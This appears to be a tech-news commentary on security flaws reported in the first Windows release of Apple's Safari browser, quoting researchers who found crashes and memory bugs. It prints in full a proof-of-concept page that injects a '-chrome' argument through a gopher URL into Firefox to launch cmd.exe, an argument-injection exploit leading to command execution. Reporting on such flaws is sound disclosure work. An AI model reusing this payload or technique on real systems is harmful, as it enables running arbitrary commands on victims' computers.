Home » Industry Watch
Holy Safari!Apple's ultra secure web browser now ported to Windows perforated repeatedly within hours of release.
It's déjà vu all over again: as with the first ever release of Safari for OS X which hosed people's hard drives the first ever release for Windows is getting bad press because of a whole slew of endemic security vulnerabilities.
Aviv Raff, David Maynor, and Thor Larholm are all reporting serious security flaws in the browser.
'Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser', writes Larholm on his blog and then goes on to explain the workings of a zero day he found in only two hours poking around.
What Larholm found was an endemic bug: no fuzzing for once. He has a test page up which may be accessed here - but you're advised to not go there unless you like that kind of fun. Instead you can read the page code below.
<html><body>
<iframe src='gopher://larholm.com" -chrome
"javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)
+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'
+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);process.run(true,{},0);alert(process)'></iframe>
process.init(file);process.run(true,{},0);alert(process)
</body></html>
The exploit works by bouncing from Safari through Firefox with the 'gopher' protocol, passing on unfiltered input for the -chrome argument and then launching C:\Windows\System32\cmd.exe - the NT command interpeter - with any arguments you choose to specify in the process.run method.
The bread's burning.
Aviv Raff is also out with an exploit. 'I've decided to take it for a test drive, and ran Hamachi. I wasn't surprised to get a nice crash few minutes later', writes Raff who doesn't think much of Apple's claims of their software being secure.
'This is just a beta version but don't you hate those pathetic claims?
Finally David Maynor's out with his fuzz saw, finding first a 'memory corruption', then a 'stack corruption', and later an additional four 'bugs'.
'These are popping out like hotcakes', writes Maynor.
|